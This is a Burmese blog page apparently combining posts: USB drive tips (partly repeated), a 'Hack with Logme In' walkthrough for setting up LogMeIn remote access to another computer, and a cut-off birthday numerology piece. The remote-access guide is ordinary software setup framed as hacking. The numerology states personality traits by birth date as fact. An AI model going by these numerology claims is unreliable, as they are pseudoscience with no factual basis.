3. Democra key ျဖင့္ လုံျခဳံစိတ္ခ်စြာ အလုပ္လုပ္သုံးစြဲနိုင္ပါတယ္တကယ္လို႔ USB drive ကိုျဖစ္ေစ၊ PC ကိုျဖစ္ေစ သုံးစြဲရတာ ကိုယ့္ရဲ့ကိုယ္ေရး အခ်က္အလက္ေတြနဲ႔ ကိုယ္ေရး ကိုယ္တာဖိုင္ေတြ မလုံျခဳံဘူးလို႔ ခံစားရရင္ Democra Key ကို download ရယူ၍ windows platform ေတြေပၚ မွာ အလုပ္လုပ္နိုင္ေသာ web application တစ္ခုလို သုံးစြဲနိုင္ပါတယ္။ အဲဒီအထဲမွာ ပုံရိပ္တည္းျဖတ္ တာေတြ၊ email ဖြင့္စစ္တာေတြ၊ ကိုယ္ေရးကိုယ္တာ အခ်က္အလက္ေတြကို encrypt ျပဳလုပ္တာေတြနဲ႔ Internet ကို browse လုပ္တာေတြ ျပဳလုပ္နိုင္ပါတယ္။ လုံျခဳံမွုအျပည့္အဝ ရွိပါတယ္။
4. XBMC Media Center ကို ထည့္သြင္းထားနိုင္ပါတယ္ကိုယ့္ PC မွာ WMP player နဲ႔ အျခား player မ်ားစြာရွိေပ မယ့္ XBMC live ကို ရယူၿပီး drive ထဲကို ထည့္သြင္း ထားမယ္ဆိုရင္ netbook မွာပဲျဖစ္ျဖစ္၊ laptop မွာပဲ ျဖစ္ျဖစ္ media file ေတြကို အလြယ္တကူ ၾကည့္ရွုခံစား နိုင္ပါတယ္။ အဲဒီအထဲမွာ အလြယ္တကူနဲ႔ လုပ္ေဆာင္နိုင္တဲ့ လုပ္ေဆာင္နိုင္တဲ့ လမ္းညြန္ခ်က္ေတြကို သင္ခန္းစာ ဖိုင္ေတြအေနနဲ႔ ၾကည့္ရွုၿပီး လိုက္လံလုပ္ေဆာင္နိုင္ပါတယ္။
5. Windows System တစ္ခုလုံးကို save လုပ္ထားနိုင္ပါတယ္တကယ္လို႔ Thumb drive ထဲမွာ Ubuntu စနစ္ တစ္ခုလုံးကို ထည့္သြင္းထားမယ္ဆိုရင္ windows ရဲ့စနစ္မွာ မွားယြင္းေနတဲ့အမွားေတြ၊ error ေတြ အားလုံးကို ubuntu ကတစ္ဆင့္ boot လုပ္ၿပီး ဝင္ေရာက္ၾကည့္ရွုရင္း ျပင္ဆင္နိုင္ပါတယ္။ ထို႔အတြက္ ပုန္းေအာင္းေနတဲ့ ဖိုင္ေတြ၊ ဖိုင္ေယာင္ေဆာင္ထားတဲ့ virus ေတြကို အလြယ္ တကူ ၾကည့္ရွုသတ္ပစ္နိုင္ၿပီး drive space ကို သန႔္သန႔္ရွင္းရွင္း analyze လုပ္နိုင္ပါတယ္။ Partition လုပ္တာ ေတြ၊ windows password ေတြကို ျပန္ေခၚ တာနဲ႔ ေပ်ာက္ဆုံးေနတဲ့ file ေတြကို ျပန္လည္ရွာေဖြတာေတြ ျပဳလုပ္ နိုင္ပါတယ္။ လုပ္ေဆာင္ပုံ နည္းအေသး စိတ္ကို lifehacker.com မွာ ၾကည့္ရွုနိုင္ပါတယ္။
6. USB Drive ကေနတစ္ဆင့္ Windows စနစ္တစ္ခုလုံးကို အမိန႔္ေပး ထိန္းခ်ဳပ္နိုင္ပါတယ္Windows ျပန္လည္ စတင္ခ်ိန္မွာ USB drive ကေန log off လုပ္တာေတြ၊ shut down လုပ္တာေတြကို USB drive ရဲ့ click ကို ႏွိပ္လိုက္ တာနဲ႔ အထဲထဲမွာ အမိန႔္ေပး file ေတြကို တန္းစီၿပီး ထည့္သြင္းဖို႔အတြက္ coding ေတြ လြယ္လင့္တကူ ရွိပါတယ္။
7. သယ္ေဆာင္ရ လြယ္ကူေသာ Windows Suite တစ္ခုလုံးကို ထည့္သြင္းသြားနိုင္ပါတယ္Portableapps.com မွာ ေရြ႕ေျပာင္း သယ္ယူရလြယ္တဲ့ software ကေလးေတြ၊ ဥပမာ Photoshop, acrobat reader, firefo×, gtalk စတဲ့ software ကေလးေတြကို download ရယူၿပီး USB drive ထဲ ထည့္ထားမယ္ ဆိုရင္ windows အတြက္ ေနရာ လြတ္ေတြမ်ားစြာ ထြက္ေပၚလာေစပါမယ္။ Memory အရမ္းစားတဲ့ software ေတြ ဆိုလို႔ရွိရင္လည္း memory အစား သက္သာသြားပါမယ္။ ဒါ့အျပင္ ႐ုံးက ကြန္ပ်ဴတာမွာ ကိုယ္လိုခ်င္တဲ့ software မရွိလို႔ အိမ္ျပန္အလုပ္လုပ္ လို႔ မရတဲ့သူေတြအတြက္လည္း အခ်ိန္ကုန္သက္သာ သြားေစပါတယ္။ Portable software ေတြဟာ software ႀကီးေတြက လြဲလို႔ function အစုံအလင္ ပါရွိၿပီး ပုံမွန္အတိုင္း အလုပ္ လုပ္နိုင္ပါတယ္။
8. USB Drive ထဲမွာ အေရးႀကီး Data ေတြကို ထားရွိနိုင္ပါတယ္တစ္ခ်ိဳ႕ မိသားစုနဲ႔ ပတ္သက္တဲ့ ကိုယ္ေရး ကိုယ္တာ ဖိုင္ေတြ၊ ကိုယ့္ရဲ့ အႀကံအစည္နဲ႔ ပတ္သက္တဲ့ idea စိတ္ကူး ေတြကို USB drive ထဲကို ထည့္သြင္း ထားၿပီး အဲဒီ USB ကို USB safeguard သုံးစြဲလိုက္ မယ္ဆိုရင္ USB ကို လက္လြတ္စပယ္ ထားခဲ့မယ္ဆို တာေတာင္မွ ကိုယ့္ဖိုင္ကို ဝင္ၾကည့္တဲ့အခါမွာ password ေတာင္းတာမ်ိဳးေတြ၊ ဖိုင္ကို ဝွက္ထားတာမ်ိဳးေတြ၊ ဖိုင္ပုံစံ ေဖ်ာက္ထားတာမ်ိဳးေတြ လုပ္ထားနိုင္တဲ့အတြက္ အဆင္ေျပပါတယ္။
9. လိုခ်င္တဲ့အခ်ိန္ေတြမွာ ဖိုင္ေတြကို ေရြ႕ေျပာင္းနိုင္ပါတယ္USB drive နဲ႔ hard drive ၾကားထဲမွာ ဖိုင္ေတြ ကို ေရြ႕ေျပာင္းတာ အလြန္လြယ္ကူပါတယ္။ USB ရဲ့ နည္းပညာ ျမင့္မားရင္ ျမင့္မားသလို ေရြ႕ေျပာင္းရ လြယ္ကူ ၿပီး ျမန္ဆန္ပါတယ္။ တကယ္လို႔ internet မွာ နာမည္ႀကီးေနတဲ့ ဖိုင္တင္တဲ့ upload sharing site ျဖစ္ၿပီး application မွာ ထုတ္ေပးထားတဲ့ drop bo× နဲ႔ဆိုရင္ USB ထဲက ဖိုင္ ေတြကို အဲဒီထဲထည့္တာေတြ၊ Online ေပၚမွာ ၾကည့္ရွုေနတဲ့အခ်ိန္မွာ ႐ုံးကေနတစ္ဆင့္ drop bo× ထဲ ထည့္သြင္းသိမ္းဆည္းထားၿပီး အိမ္ကေနတစ္ဆင့္ အလြယ္တကူ ျပန္လည္ၾကည့္ရွုနိုင္ပါတယ္။
10. Linu× OS ကို USB Drive ထဲ ထည့္သြင္းထားနိုင္ပါတယ္Linu× အႏြယ္ဝင္ OS ေတြဟာ virus အနတရာယ္ ကင္းရွင္းေစၿပီး သုံးစြဲရ လြယ္ကူတဲ့အျပင္ အခုဆိုရင္ ေရြ႕ေျပာင္း သယ္ေဆာင္ရ လြယ္ကူတဲ့ Portable Linu× OS ေတြပါ ထြက္ရွိလာတဲ့အတြက္ drive ထဲကို ထည့္သြင္းထားၿပီး အလုပ္လုပ္တဲ့အခါမွာ- ဥပမာ ႐ုံးမွာ virus ေတြ အလြန္ကိုက္ေနတဲ့အတြက္ ႐ုံးက virus ေတြ အိမ္က ကြန္ပ်ဴတာကို ပါလာမွာ စိုးရိမ္ေနသူမ်ားအတြက္ အလြန္ အသုံးဝင္ၿပီး ႐ုံးမွအိမ္၊ အိမ္မွ႐ုံး USB drive မွတစ္ဆင့္ လြယ္ကူစြာ အလုပ္လုပ္နိုင္မွာ ျဖစ္ပါတယ္။
1. USB Drive ကို icon အေနနဲ႔ သုံးနိုင္ပါတယ္တကယ္လို႔ ကြန္ပ်ဴတာမွာ USB Hub တစ္ခုကို ထားရွိသုံးစြဲမယ္ ဆိုရင္၊ ေနာက္ၿပီး USB အမ်ားႀကီးနဲ႔ Multiple USB port ေတြ ထားရွိ သုံးစြဲမယ္ဆိုရင္ အမ်ိဳးမ်ိဳး အစားစားကြဲျပားတဲ့ ကိုယ့္ရဲ့ USB ကို icon ေတြအေနနဲ႔ ေဖာ္ျပ ေပးထားနိုင္ပါတယ္။ အဲဒီလို ေဖာ္ျပေပးတဲ့ XP, Vista, Windows 7 ေတြမွာ ပါဝင္တဲ့ custom icon ေတြကို အသုံးျပဳၿပီး folder ေတြကို icon ပုံစံခ်ိန္းတဲ့ ပုံစံမ်ိဳးအဆင့္ပဲ လြယ္လြယ္ ကူကူ ရွိပါတယ္။ ပထမဦးဆုံးအေနနဲ႔ (.ico) format ကို drive ထဲမွာ အရင္ ေမာင္းထည့္ရ ပါမယ္။ အကယ္၍ web application တစ္ခုျဖစ္တဲ့ convert icon ကို အသုံးျပဳလည္း ရပါတယ္။ icon ကို အမ်ိဳးအစားကြဲျပားစြာနဲ႔ USB မွာ ရည္ညြန္းေဖာ္ျပေပးမွာ ျဖစ္တဲ့အတြက္ ဘယ္ USB က ဘာ file ေတြ ပါဝင္တယ္ဆိုတာ အလြယ္တကူ သိရွိရမွာပါ။
2. Google ၏ OS ကို အိတ္ထဲ ထည့္ထားနိုင္ပါတယ္Google ၏ OS ျဖစ္တဲ့ Chrome OS ကို USB drive ထဲမွာ ထည့္သြင္းၿပီး ကိုယ့္ကြန္ပ်ဴတာရဲ့ ဒုတိယ OS အျဖစ္ ထားရွိ သုံးစြဲနိုင္ပါတယ္။ အလြန္ျမန္ဆန္ၿပီး ကိုယ့္စိတ္ႀကိဳက္ custom ျပဳလုပ္ထားနိုင္ပါတယ္။ ဒီဇိုင္း အဆင္အျပင္ေတြကအစ ပါဝင္တဲ့ coding ေတြကို သြားျပန္ၿပီး ျပင္ဆင္ေရး သားနိုင္တဲ့ open source OS တစ္ခု ျဖစ္ပါတယ္။
3. Democra key ျဖင့္ လုံျခဳံစိတ္ခ်စြာ အလုပ္လုပ္သုံးစြဲနိုင္ပါတယ္တကယ္လို႔ USB drive ကိုျဖစ္ေစ၊ PC ကိုျဖစ္ေစ သုံးစြဲရတာ ကိုယ့္ရဲ့ကိုယ္ေရး အခ်က္အလက္ေတြနဲ႔ ကိုယ္ေရး ကိုယ္တာဖိုင္ေတြ မလုံျခဳံဘူးလို႔ ခံစားရရင္ Democra Key ကို download ရယူ၍ windows platform ေတြေပၚ မွာ အလုပ္လုပ္နိုင္ေသာ web application တစ္ခုလို သုံးစြဲနိုင္ပါတယ္။ အဲဒီအထဲမွာ ပုံရိပ္တည္းျဖတ္ တာေတြ၊ email ဖြင့္စစ္တာေတြ၊ ကိုယ္ေရးကိုယ္တာ အခ်က္အလက္ေတြကို encrypt ျပဳလုပ္တာေတြနဲ႔ Internet ကို browse လုပ္တာေတြ ျပဳလုပ္နိုင္ပါတယ္။ လုံျခဳံမွုအျပည့္အဝ ရွိပါတယ္။
4. XBMC Media Center ကို ထည့္သြင္းထားနိုင္ပါတယ္ကိုယ့္ PC မွာ WMP player နဲ႔ အျခား player မ်ားစြာရွိေပ မယ့္ XBMC live ကို ရယူၿပီး drive ထဲကို ထည့္သြင္း ထားမယ္ဆိုရင္ netbook မွာပဲျဖစ္ျဖစ္၊ laptop မွာပဲ ျဖစ္ျဖစ္ media file ေတြကို အလြယ္တကူ ၾကည့္ရွုခံစား နိုင္ပါတယ္။ အဲဒီအထဲမွာ အလြယ္တကူနဲ႔ လုပ္ေဆာင္နိုင္တဲ့ လုပ္ေဆာင္နိုင္တဲ့ လမ္းညြန္ခ်က္ေတြကို သင္ခန္းစာ ဖိုင္ေတြအေနနဲ႔ ၾကည့္ရွုၿပီး လိုက္လံလုပ္ေဆာင္နိုင္ပါတယ္။
5. Windows System တစ္ခုလုံးကို save လုပ္ထားနိုင္ပါတယ္တကယ္လို႔ Thumb drive ထဲမွာ Ubuntu စနစ္ တစ္ခုလုံးကို ထည့္သြင္းထားမယ္ဆိုရင္ windows ရဲ့စနစ္မွာ မွားယြင္းေနတဲ့အမွားေတြ၊ error ေတြ အားလုံးကို ubuntu ကတစ္ဆင့္ boot လုပ္ၿပီး ဝင္ေရာက္ၾကည့္ရွုရင္း ျပင္ဆင္နိုင္ပါတယ္။ ထို႔အတြက္ ပုန္းေအာင္းေနတဲ့ ဖိုင္ေတြ၊ ဖိုင္ေယာင္ေဆာင္ထားတဲ့ virus ေတြကို အလြယ္ တကူ ၾကည့္ရွုသတ္ပစ္နိုင္ၿပီး drive space ကို သန႔္သန႔္ရွင္းရွင္း analyze လုပ္နိုင္ပါတယ္။ Partition လုပ္တာ ေတြ၊ windows password ေတြကို ျပန္ေခၚ တာနဲ႔ ေပ်ာက္ဆုံးေနတဲ့ file ေတြကို ျပန္လည္ရွာေဖြတာေတြ ျပဳလုပ္ နိုင္ပါတယ္။ လုပ္ေဆာင္ပုံ နည္းအေသး စိတ္ကို lifehacker.com မွာ ၾကည့္ရွုနိုင္ပါတယ္။
6. USB Drive ကေနတစ္ဆင့္ Windows စနစ္တစ္ခုလုံးကို အမိန႔္ေပး ထိန္းခ်ဳပ္နိုင္ပါတယ္Windows ျပန္လည္ စတင္ခ်ိန္မွာ USB drive ကေန log off လုပ္တာေတြ၊ shut down လုပ္တာေတြကို USB drive ရဲ့ click ကို ႏွိပ္လိုက္ တာနဲ႔ အထဲထဲမွာ အမိန႔္ေပး file ေတြကို တန္းစီၿပီး ထည့္သြင္းဖို႔အတြက္ coding ေတြ လြယ္လင့္တကူ ရွိပါတယ္။
7. သယ္ေဆာင္ရ လြယ္ကူေသာ Windows Suite တစ္ခုလုံးကို ထည့္သြင္းသြားနိုင္ပါတယ္Portableapps.com မွာ ေရြ႕ေျပာင္း သယ္ယူရလြယ္တဲ့ software ကေလးေတြ၊ ဥပမာ Photoshop, acrobat reader, firefo×, gtalk စတဲ့ software ကေလးေတြကို download ရယူၿပီး USB drive ထဲ ထည့္ထားမယ္ ဆိုရင္ windows အတြက္ ေနရာ လြတ္ေတြမ်ားစြာ ထြက္ေပၚလာေစပါမယ္။ Memory အရမ္းစားတဲ့ software ေတြ ဆိုလို႔ရွိရင္လည္း memory အစား သက္သာသြားပါမယ္။ ဒါ့အျပင္ ႐ုံးက ကြန္ပ်ဴတာမွာ ကိုယ္လိုခ်င္တဲ့ software မရွိလို႔ အိမ္ျပန္အလုပ္လုပ္ လို႔ မရတဲ့သူေတြအတြက္လည္း အခ်ိန္ကုန္သက္သာ သြားေစပါတယ္။ Portable software ေတြဟာ software ႀကီးေတြက လြဲလို႔ function အစုံအလင္ ပါရွိၿပီး ပုံမွန္အတိုင္း အလုပ္ လုပ္နိုင္ပါတယ္။
8. USB Drive ထဲမွာ အေရးႀကီး Data ေတြကို ထားရွိနိုင္ပါတယ္တစ္ခ်ိဳ႕ မိသားစုနဲ႔ ပတ္သက္တဲ့ ကိုယ္ေရး ကိုယ္တာ ဖိုင္ေတြ၊ ကိုယ့္ရဲ့ အႀကံအစည္နဲ႔ ပတ္သက္တဲ့ idea စိတ္ကူး ေတြကို USB drive ထဲကို ထည့္သြင္း ထားၿပီး အဲဒီ USB ကို USB safeguard သုံးစြဲလိုက္ မယ္ဆိုရင္ USB ကို လက္လြတ္စပယ္ ထားခဲ့မယ္ဆို တာေတာင္မွ ကိုယ့္ဖိုင္ကို ဝင္ၾကည့္တဲ့အခါမွာ password ေတာင္းတာမ်ိဳးေတြ၊ ဖိုင္ကို ဝွက္ထားတာမ်ိဳးေတြ၊ ဖိုင္ပုံစံ ေဖ်ာက္ထားတာမ်ိဳးေတြ လုပ္ထားနိုင္တဲ့အတြက္ အဆင္ေျပပါတယ္။
9. လိုခ်င္တဲ့အခ်ိန္ေတြမွာ ဖိုင္ေတြကို ေရြ႕ေျပာင္းနိုင္ပါတယ္USB drive နဲ႔ hard drive ၾကားထဲမွာ ဖိုင္ေတြ ကို ေရြ႕ေျပာင္းတာ အလြန္လြယ္ကူပါတယ္။ USB ရဲ့ နည္းပညာ ျမင့္မားရင္ ျမင့္မားသလို ေရြ႕ေျပာင္းရ လြယ္ကူ ၿပီး ျမန္ဆန္ပါတယ္။ တကယ္လို႔ internet မွာ နာမည္ႀကီးေနတဲ့ ဖိုင္တင္တဲ့ upload sharing site ျဖစ္ၿပီး application မွာ ထုတ္ေပးထားတဲ့ drop bo× နဲ႔ဆိုရင္ USB ထဲက ဖိုင္ ေတြကို အဲဒီထဲထည့္တာေတြ၊ Online ေပၚမွာ ၾကည့္ရွုေနတဲ့အခ်ိန္မွာ ႐ုံးကေနတစ္ဆင့္ drop bo× ထဲ ထည့္သြင္းသိမ္းဆည္းထားၿပီး အိမ္ကေနတစ္ဆင့္ အလြယ္တကူ ျပန္လည္ၾကည့္ရွုနိုင္ပါတယ္။
10. Linu× OS ကို USB Drive ထဲ ထည့္သြင္းထားနိုင္ပါတယ္Linu× အႏြယ္ဝင္ OS ေတြဟာ virus အနတရာယ္ ကင္းရွင္းေစၿပီး သုံးစြဲရ လြယ္ကူတဲ့အျပင္ အခုဆိုရင္ ေရြ႕ေျပာင္း သယ္ေဆာင္ရ လြယ္ကူတဲ့ Portable Linu× OS ေတြပါ ထြက္ရွိလာတဲ့အတြက္ drive ထဲကို ထည့္သြင္းထားၿပီး အလုပ္လုပ္တဲ့အခါမွာ- ဥပမာ ႐ုံးမွာ virus ေတြ အလြန္ကိုက္ေနတဲ့အတြက္ ႐ုံးက virus ေတြ အိမ္က ကြန္ပ်ဴတာကို ပါလာမွာ စိုးရိမ္ေနသူမ်ားအတြက္ အလြန္ အသုံးဝင္ၿပီး ႐ုံးမွအိမ္၊ အိမ္မွ႐ုံး USB drive မွတစ္ဆင့္ လြယ္ကူစြာ အလုပ္လုပ္နိုင္မွာ ျဖစ္ပါတယ္။
Saturday, July 14
Hack with Logme In
ဒီေဆာ့၀ဲေလးရဲ့ရည္ရြယ္ခ်က္ကေတာ့တစ္ေနရာကကြန္ျပဴတာကေနနက္၀ပ္ခ်ိတ္ထားတဲ့
တစ္ျခားကြန္ျပဴတာတစ္လံုးကိုျပဳျပင္ႏိုင္ေစဖို႕ရည္ရြယ္တာပါ။ဒီေဆာ့၀ဲေလး အေၾကာင္းကို နားလည္သြားရင္
ဘယ္သူကိုမွသြားၿပီး ဒုတ္ခမေပး ဖို. အဲဒီအတြက္ ႀကိဳၿပီး ေျပာထားပရေစ။
၁။ www.logmein.com ကို၀င္ပါ။ ၿပီးရင္ Download logmein free ဆိုတဲ့ အစိမ္းေရာင္ အကြက္ေလးကို ကလစ္လုပ္ပါ။
ၿပီးရင္ အီးေမးလ္ တို. ဘာညာတို. ရိုက္ၿပီး အေကာင့္ ဖြြင့္ပါ။ ၿပီးရင္ Go ကို ႏွိပ္။
၂။ၿပီးရင္ add computer ကို ထပ္ႏိွပ္။ ၿပီးရင္ ေဆာ့၀ဲကို ေဒါင္းေလာ့ဆြဲပါ။
၃။ ၿပီးရင္ ေဆာ့၀ဲကို Run လိုက္ပါ။ Next => I agree => typical => Next =>Next=>
computer access code ဆိုၿပီးေတာင္းရင္ ေပးခ်င္တဲ့ password 8 လံုးေပးလိုက္ပါ။ ေအာက္မွာလည္း
အဲ ဒီ 8 လံုးပဲ ျပန္ရိုက္။ ကိုယ္ေပးထားတာေတာ့ မွက္ထားဦးေနာ္။
၄။ Email ေတာင္းရင္ ခုနက အေကာင့္ ဖြင့္တုန္းက ေပးခဲ့တဲ့ အီးေမးကို ျပန္ထည့္။ password ကလဲ အေကာင့္ဖြင့္တုန္းကေပးတဲ့ password ပဲအင။ ၿပီးရင္ Next ကို မႏွိပ္နဲ.ဦး။ logmein freee ဆိုတာေရြးေပးလိုက္ဦး။
ၿပီးမွ Next လုပ္။
၅။ အင္စေတာလုပ္ၿပီးသြားရင္ Restart ခ်ရလိမ့္မယ္။ ဒါဆိုရင္ ၿပီးသြားပါၿပီ။ Task Bar ရဲ့ ညာဘက္ေအာက္မွာ ေခြးေျခရာ
ပံုေလးေပၚေနပါလိမ့္မယ္။
၆။ အဲဒီ ကြန္ျပဴတာကို ဖြင့္ထားၿပီး
တျခားကြန္ျပဴတာကေနၿပီး အင္တာနက္က www.logmein.com ဆိုတဲ့ ၀က္ဆိုဒ္ကို ျပန္၀င္
၇။ ၀ဘ္ဆိုဒ္ရဲ့ ညာဘက္ ထိတ္နာမွာ Email မွာ ကိုယ္အေကာင့္ဖြင့္ထားတဲ့ အီးေမးလ္ ရိုက္ထည့္ ၊ ၿပီးရင္ Password ေပါ့။
Enter ။
က်န္တာေတြကေတာ့ ကိုယ့္ဘာသာစမ္းလို.ရလိမ့္မယ္လို. ထင္ပါတယ္။
နိဳင္ငံရပ္ျခားက ကြန္ျပဴတာေတြကို ကိုယ့္ေနရာကေနၿပီး လွမ္းျပင္နိဳင္ပါေစဗ်ာ။
MCDA မွဖ်က္ခုတ္လာသည္ (ပို႕အသစ္မတင္ျဖစ္ႏိုင္ေသာေၾကာင့္)
Wednesday, July 4
ေမြးေန ေမြးရက္မ်ားနဲ သူတို.၏ ဂုဏ္သတၱိေတြပါ.
တကယ္လို့..မင္းဟာ..လေတြရဲ့. 1st, 10th, 19th, 28th မွာ ေမြးဖြားခဲ့မယ္ဆိုရင္.. ==
မင္းဟာ.. နံပါတ္ (၁) သမား...
တကယ္လို့..မင္းဟာ..လေတြရဲ့. 2nd, 11th, 20th, 29th မွာ ေမြးဖြားခဲ့မယ္ဆိုရင္.. ==
မင္းဟာ.. နံပါတ္ (၂) သမား...
တကယ္လို့..မင္းဟာ..လေတြရဲ့. 3rd, 12th, 21st, 30th မွာ ေမြးဖြားခဲ့မယ္ဆိုရင္.. ==
မင္းဟာ.. နံပါတ္ (၃) သမား...
တကယ္လို့..မင္းဟာ..လေတြရဲ့. 4th, 13th, 22nd, 31st မွာ ေမြးဖြားခဲ့မယ္ဆိုရင္.. ==
မင္းဟာ.. နံပါတ္ (၄) သမား...
တကယ္လို့..မင္းဟာ..လေတြရဲ့. 5th, 14th, 23rd မွာ ေမြးဖြားခဲ့မယ္ဆိုရင္.. ==
မင္းဟာ.. နံပါတ္ (၅) သမား...
တကယ္လို့..မင္းဟာ..လေတြရဲ့. 6th, 15th, 24th မွာ ေမြးဖြားခဲ့မယ္ဆိုရင္.. ==
မင္းဟာ.. နံပါတ္ (၆) သမား...
တကယ္လို့..မင္းဟာ..လေတြရဲ့. 7th, 16th, 25th မွာ ေမြးဖြားခဲ့မယ္ဆိုရင္.. ==
မင္းဟာ.. နံပါတ္ ၇ သမား...
တကယ္လို့..မင္းဟာ..လေတြရဲ့. 8th, 17th, 26th မွာ ေမြးဖြားခဲ့မယ္ဆိုရင္.. ==
မင္းဟာ.. နံပါတ္ ၈ သမား...
တကယ္လို့..မင္းဟာ..လေတြရဲ့. 9th, 18th, 27th မွာ ေမြးဖြားခဲ့မယ္ဆိုရင္.. ==
မင္းဟာ.. နံပါတ္ (၉) သမား...
*******************************************
နံပါတ္ (၁)
မင္းဟာ..ပါးနပ္တယ္..စကားကိုရွင္းရွင္းေျပာတက္တယ္..ဟာသဥာဏ္ရႊင္တယ္..
ေခါင္းမာတယ္. ရိုးသားတယ္.. တဖက္သားကို မနာလို ၀န္တိုတက္တယ္..ႀကင္နာတက္တယ္..
ေဒါသလြယ္တယ္..ေဖာ္ေရႊတယ္..တာ၀န္ယူလိုစိတ္ရွိတယ္..
အျမဲတမ္းေက်ာ္ႀကားသူတေယာက္ျဖစ္ခ်င္တယ္..
လူေတြအားလံုးရဲ့အထက္မွာပဲ ေနခ်င္တယ္.. တခါတရံမွာ လြတ္လပ္မႈကို ျမတ္နိုးတယ္..
သူတပါးရဲ့အုပ္ခ်ဳပ္မႈကို မခံခ်င္ဘူး...မိမိကိုယ္ကို ယံုႀကည္တက္တဲ့ လူစားမ်ိဳးျဖစ္တယ္..
ငယ္ငယ္ရႊယ္ရႊယ္နဲ့ အခ်စ္ကို ေတြ႔တက္ႀကတယ္..ဒါေပမယ့္..
ရင့္က်က္တဲ့အရြယ္ေရာက္မွပဲ ..... လက္ထက္ျဖစ္ႀကတာမ်ားပါတယ္..
အျမင္မတူတဲ့သူေတြနဲ့ ျပႆနာတက္ရတာကို နွစ္သက္တယ္..
အျငိဳးအေတးႀကီးျပီး..လက္စားေခ်တက္ႀကတယ္..
အသံုးအျဖဳန္းႀကီး သူတေယာက္ျဖစ္ေပမယ့္.....
မင္းမွာ အလုပ္အကိုင္ေကာင္းေတြ ရတက္ပါတယ္..
မင္းသာ အမ်ိဳးသားဆိုရင္..အရမ္းနာမည္ေက်ာ္မယ္.. ဆြဲေဆာင္မႈရွိတဲ့ခႏၶာကိုယ္ကုိ ပိုင္ဆိုင္ေနမွာျဖစ္ျပီ..
လူတိုင္းက မင္းကို ေလးစားေနပါလိမ့္မယ္..မင္းဟာ.ေနရာစံု ၀င္ဆန့္နိုင္တဲ့သူတေယာက္ျဖစ္တယ္..
ရပ္ကြက္ထဲမွသည္.. ဟိုအေပၚ ပါလီမန္ေတြထိကို
မင္းက ေနရာစံုသြားနိုင္သူပါ..ဘာျဖစ္လို့လဲ ဆိုေတာ့..ကိစၥေတာ္ေတာ္မ်ားမ်ားကို
မင္းက တဖတ္ကန္ခတ္ေအာင္ သိေနတက္တယ္ေလ..
ဒါေပမယ့္..မင့္ရဲ့ဘ၀မွာ..တခ်ိဳ့လူေတြက မင္းဘ၀နွိပ့္က်သြားေအာင္..
နာမည္ပ်က္သြားေအာင္ လုပ္တာမ်ိဳး..ႀကံုရတက္ပါတယ္...
ဒါကလည္း မဆန္းပါဘူး...လူေတြရဲ့မနာလိုမႈေႀကာင့္ပါပဲ..
မင့္ရဲ့မိသားစုဘ၀က ေအးခ်မ္းလြန္ပါတယ္.. မင္းဟာ အေဖာ္မြန္ေကာင္းကို ပိုင္ဆိုင္ျပီ..
ခ်စ္စဖြယ္သားသမီးေတြနဲ့ ေနထိုင္ရပါလိမ့္မယ္..မင္းဟာ..ေရွ့ေဆာင္သူ..
လြတ္လပ္မႈကို ျမတ္နိုးသူ.. ဘာသာတရားကို ကိုယ္ရႈိုင္းသူတေယာက္ပါပဲ..
မင္းရဲ့အေကာင္းဆံုးအေဖာ္မြန္ နံပါတ္ေတြကေတာ့.. 4, 6, 8 ...
သင့္တင္တဲ့သူေတြကေတာ့.. 3, 5, 7!!!
***********
နံပါတ္(၂)
မင္းဟာ ဘာႀကီးပဲျဖစ္ေနေန.. မင္းကို လူတိုင္းက ခ်စ္ႀကပါတယ္..
ဘာျဖစ္လို့လဲ ဆိုေတာ့..မင္းဟာလ နဲ့ တူလို့ပါ.. လကို လူတိုင္းက သေဘာက်သလိုမ်ိဳးေပါ့..
ျပီးေတာ့ မင္းဟာ..စိတ္ကူးအရမ္းယဥ္တက္သူ တစ္ဦးလည္းျဖစ္တယ္...
မင္းဟာ ကို္ယ့္ကိုယ္ကို ယံုႀကည္မႈအလြန္နည္းတယ္..မင္းဘ၀မွာ
ျပန္ျပီးသုံးသပ္သင့္စရာေတြခ်ည္းပဲ...
မင္းဟာ ခန့္မွန္းရခက္တဲ့သူ တစ္ဦးလည္းျဖစ္တယ္..
အခ်ိန္နဲ့အေျခအေနကို လိုက္ျပီး မင္းဟာအျမဲတမ္းေျပာင္းလဲေနတယ္..
တကိုယ္ေကာင္းဆန္ျပီ.. အနုပညာဘက္မွာ အားအေတာ္သန္တဲ့သူျဖစ္တယ္..
အေျပာအဆိုညက္ေညာေျပျပစ္တယ္.
မင္းရဲ့အျပဳအမႈေတြဟာ လလို့ပဲ.. ေနအလင္းေရာင္ ေပ်ာက္မွ လထြက္လာသလိုမ်ိဳး....
လူေတြ စိတ္ဓါတ္က်ေနတဲ့အခ်ိန္ဆို ေရာက္လာျပီ..
သူတို့ေတြ စိတ္ဓါတ္ျမင့္တက္လာျပီဆိုရင္ မင္းဟာ သူတို့ဘ၀ထဲက ေပ်ာက္ကြယ္သြားတက္တယ္..
မင္းဟာ.. ျငိမ္းခ်မ္းမႈကို ျမတ္နိုးတဲ့.ဒုတိယ ဂႏၵီ ျဖစ္နိုင္သလို...ျငိမ္းခ်မ္းမႈကို ဖ်က္ဆီးမဲ့..
ဒုတိယ ဟစ္တလာလည္း ျဖစ္နိုင္ပါတယ္
(က်ေနာ္ဆိုလိုတာက မင္းရဲ့ပတ္၀န္းက်င္ ဆက္ဆံေရးေပၚမွာပါ).
တကယ့္လိုမ်ား..ဘုရားတရားကို နက္နက္ရႈိုင္းရႈိုင္းလုပ္မယ္ဆိုရင္...
မင္းဟာ ေအာင္ျမင္မယ့္သူတစ္ဦးပါ...
အမ်ားစုေသာ မင္းရဲ့စကားလံုးေတြဟာ ေပ်ာ္ရႊင္မႈေတြဆီကိုပဲ ဦးတည္ေနတာပါ..!
တခါတရံ မင္းဟာ ေရွ့ေရးကို ႀကိဳျပီး ခံစားမိတက္သူတစ္ဦးပါ.
မင္းဟာ ကဗ်ာဆရာ..စာေရးဆရာ.. အနုပညာနယ္ပယ္မွာ က်င္လည္မႈသူတစ္ဦးပါ...
မင္းဟာ အခ်စ္ကို အရမ္းႀကီးမယံုႀကည္တက္သူတစ္ဦးပါ..
မင္းလက္ထက္ျပီးတဲ့အထိေတာင္ အဲဒီအတိုင္းပဲ
မင္းဟာ အခ်စ္အေပၚ သာမန္ပဲခံစားေနတက္သူတစ္ဦပါ..
မင္းဟာ မိန္းကေလးဆိုရင္ေတာ့..မိသားစုမွာ တာ၀န္သိအမ်ိဳးသမီးတဦးျဖစ္ေနပါလိမ့္မယ္..
